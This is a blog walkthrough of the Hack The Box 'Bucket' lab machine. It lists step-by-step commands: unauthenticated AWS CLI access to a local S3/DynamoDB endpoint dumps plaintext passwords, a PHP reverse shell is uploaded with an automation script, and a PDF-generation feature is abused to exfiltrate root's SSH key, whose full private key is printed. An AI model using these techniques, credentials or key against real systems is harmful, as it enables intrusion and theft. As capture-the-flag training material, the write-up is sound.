Posts Hackthebox Bucket writeup
Post
Cancel

Hackthebox Bucket writeup

Introduction@Bucket:~$

Column Details
Name Bucket
IP 10.10.10.212
Points 30
Os Linux
Difficulty Medium
Creator MrR3boot
Out On 17 Oct 2020

Summary

  • Nmap shows the 2 Ports open.
  • Getting the web server
  • finding a directory called /shell
  • using aws cli to upload a shell
  • And we get a shell
  • grab user.txt
  • we find a service running on a port 4566
  • port forward it and get a web servercode-execution as root.
  • Creating alerts table
  • Insert payload.
  • Trigger payload and create pdf file
  • geeting id_rsa of root and then ssh in.
  • grab root.txt

Pwned

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

┌─[root@d3dsec]─[~/Desktop/HTB/Bucket]
└──╼ #cat nmap/result.nmap 
# Nmap 7.80 scan initiated Sun Sep 27 08:19:05 2020 as: nmap -sC -sV -oA /result 10.10.10.212
Nmap scan report for 10.10.10.212
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE  VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://bucket.htb/
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.32 seconds
                                                                

So basically Two ports are opened 22:ssh 80:http

We find the sub-domain bucket.htb in the nmap result Let's first add this in our /etc/hosts file.

Port-80

Port-80

There is a simple Bucket Advertising Platform.

Port-80

Let's view the source code.

Port-80

we see a new domain let's add this in our hosts file and go to that page.

Port-80

It's says running.

Let's use Gobuster to find something new.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

┌─[root@d3dsec]─[~/Desktop/HTB/Bucket]                                                                                                                                                        
└──╼ #gobuster dir -u http://s3.bucket.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.0.1                                                                                                                                                                               
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)                                                                                                                               
===============================================================
[+] Url:            http://s3.bucket.htb/                                                                                                                                                     
[+] Threads:        50                                                                                                                                                                        
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt                                                                                                              
[+] Status codes:   200,204,301,302,307,401,403                                                                                                                                               
[+] User Agent:     gobuster/3.0.1                                                                                                                                                            
[+] Timeout:        10s                                                                                                                                                                       
===============================================================
2020/10/29 17:47:50 Starting gobuster                                                                                                                                                         
===============================================================
/health (Status: 200)                                                                                                                                                                         
/shell    (Status: 200)
                                                                

We find a /shell directory it's something new. let's check it out.

Port-80

It's a DynamoDB Web Shell and we also run command in that but i like to run the command in CLI.

Let's configure our aws CLI.

But First install the awsCLI.

1

sudo apt-get install awscli
                                                                

Now let's configure it for our use.

1
2
3
4
5

aws configure
AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-west-2
Default output format [None]: json
                                                                

Now our setup is complete. Let's list the table in the DynamoDB Database.

1

aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/ --no-sign-request
                                                                

Bucket.htb

there is only one table users.

Let's list the content in that.

1

aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ --no-sign-request
                                                                

Bucket.htb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

{
"Items": [
    {
        "password": {
            "S": "Management@#1@#"
        },
        "username": {
            "S": "Mgmt"
        }
    },
    {
        "password": {
            "S": "Welcome123!"
        },
        "username": {
            "S": "Cloudadm"
        }
    },
    {
        "password": {
            "S": "n2vM-<_K_Q:.Aa2"
        },
        "username": {
            "S": "Sysadm"
        }
    }
],
"Count": 3,
"ScannedCount": 3,
"ConsumedCapacity": null
}
                                                                

We got some creads

I try this to get ssh but nothing is working.

we find a web server on http://s3.bucket.htb that says running.

Let's try to enumerate and list the Buckets on that.

1

aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request
                                                                

Bucket.htb

There is one bucket called adserver.

I think this bucket connect to http://bucket.htb page.

Let's list the content in the adserver bucket.

1

aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver
                                                                

Bucket.htb

It's dump all the files on the adserver bucket.

Hmm.. Let's try to put our simple php-reverse shell in that.

1

aws --endpoint-url http://s3.bucket.htb/ s3 cp /root/Desktop/HTB/Bucket/shell.php s3://adserver/images/shell.php
                                                                

Bucket.htb

Let's list the file for double-check that our reverse shell is available in the adserver bucket or not.

1

aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver
                                                                

Bucket.htb

Boom our shell.php successfully insert inside the images directory.

Let's do a curl req to that directory and see our reverse shell is working or not.

Important : I use this method again so my shell name is shell1.php in your case shell name is shell.php

And After running this command start your netcat listner on port which you add in your reverse shell.

1

curl --write-out "%{http_code}\n" --silent --output /dev/null http://s3.bucket.htb/adserver/images/shell1.php
                                                                

Bucket.htb

It's says 404 not found.

hmm i think it's a cronjob think we need to be quick to get a reverse shell.

I create a script to automate curl req let's use this.

1
2
3
4
5

while [[ $resp -eq 404 ]]; do
    resp=$(curl --write-out "%{http_code}\n" --silent --output /dev/null  http://bucket.htb/images/shell1.php)
    echo $resp
    sleep 0.1;
done
                                                                

I again do the same step again but i didn't get the reverse shell.

Let's create the automate script to upload and execute it automatically.

I wrote a script to automate the process.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

#!/bin/bash

export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
echo "List Files."
aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver

## Copy file to Bucket

aws --endpoint-url http://s3.bucket.htb/ s3 cp /root/Desktop/HTB/Bucket/shell.php s3://adserver/images/shell1.php

echo "Check if file is uploaded"
aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver

# Check if file exist
echo "Checking on s3.bucket"
# curl --write-out "%{http_code}\n" --silent --output /dev/null http://s3.bucket.htb/adserver/images/shell1.php
curl --write-out "%{http_code}\n" --silent --output /dev/null http://s3.bucket.htb/adserver/images/shell1.php
resp=404
while [[ $resp -eq 404 ]]; do
    resp=$(curl --write-out "%{http_code}\n" --silent --output /dev/null  http://bucket.htb/images/shell1.php)
    echo $resp
    sleep 0.1;
done

                                                                

I name the script dedsec.sh you choose your name as you wish.

now the only work is to start your listner and get a sweet reverse shell.

Important : You run this script two three times to get a reverse shell.

Bucket.htb

Boom we got the reverse shell.

Let's check the /etc/passwd file to known about users in the machiene.

Bucket.htb

there is a one user name roy let's try the password which we find in bucket.

Bucket.htb

Boom we get the user privilege and get your user.txt.

Privilege escalation

Before we start our Privilege escalation Let's do one think copy our ssh public key in roy .ssh folder so we got the ssh connection that's better than netcat shell.

Bucket.htb

Now let's ssh in and get our beautiful ssh connection.

Bucket.htb

After some enumeration I find an interesting directory called bucket-app.

Bucket.htb

Let's cat the index.php and check what this file do.

Bucket.htb

the index.php shows another communcation to the internal service, a new table name alerts which is accessed with a post request with the values data and create a pdf.

Link : HTML to PDF converter for Java and .NET

We will abuse this to get root id_rsa file.

Step 1

First thing first we need to port forward on port 8000. Because aws is installed in the system and an internal service port 8000 (web service) and port 4566 (aws service)

1

ssh -L 8000:127.0.0.1:8000 roy@10.10.10.212
                                                                

Bucket.htb

Let's crosscheck that our port is forward or not open your browser and type 127.0.0.1:8000 if it's show the web server then your port is successfully forwarded.

Bucket.htb

Step 2

create a new dynameDB Table.

Use this command inside the machiene.

1

/usr/bin/aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://127.0.0.1:4566
                                                                

Bucket.htb

Step 3

create a table and insert the values as requested by the index.php.

Bucket.htb

Step 4

Now we only need to do a curl req.

1

curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v
                                                                

Bucket.htb

Step 5

Now open your browser and go to 127.0.0.1:8000/files/

Bucket.htb

There is a result.pdf open it.

Bucket.htb

Click on this pin icon and download the id_rsa of root.

Bucket.htb

But i want to download it from my terminal so the file is organised in my bucket directory.

Bucket.htb

1
2

chmod 600 id_rsa
ssh -i id_rsa root@10.10.10.212
                                                                

i will give you the id_rsa of root that in case for the backup plan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
                                                                

Bucket.htb

Now the only step is missing the root.txt. Let's grab it.

Bucket.htb

And we pwned it …….

If u liked the writeup.Support a Student to Get the OSCP-Cert Donation for OSCP

Resources

Topic Url
HTML to PDF converter for Java and .NET https://pd4ml.com/cookbook/pdf-attachments.htm
This post is licensed under CC BY 4.0

Hackthebox Jewel writeup

Fortress Reel2 writeup

© 2020 Dedinfosec . All rights reserved.